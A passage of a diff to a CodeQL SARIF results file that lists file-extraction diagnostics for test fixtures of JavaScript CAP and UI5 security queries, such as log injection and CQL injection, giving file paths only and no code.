"id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 77 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 87 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + } + } ], + 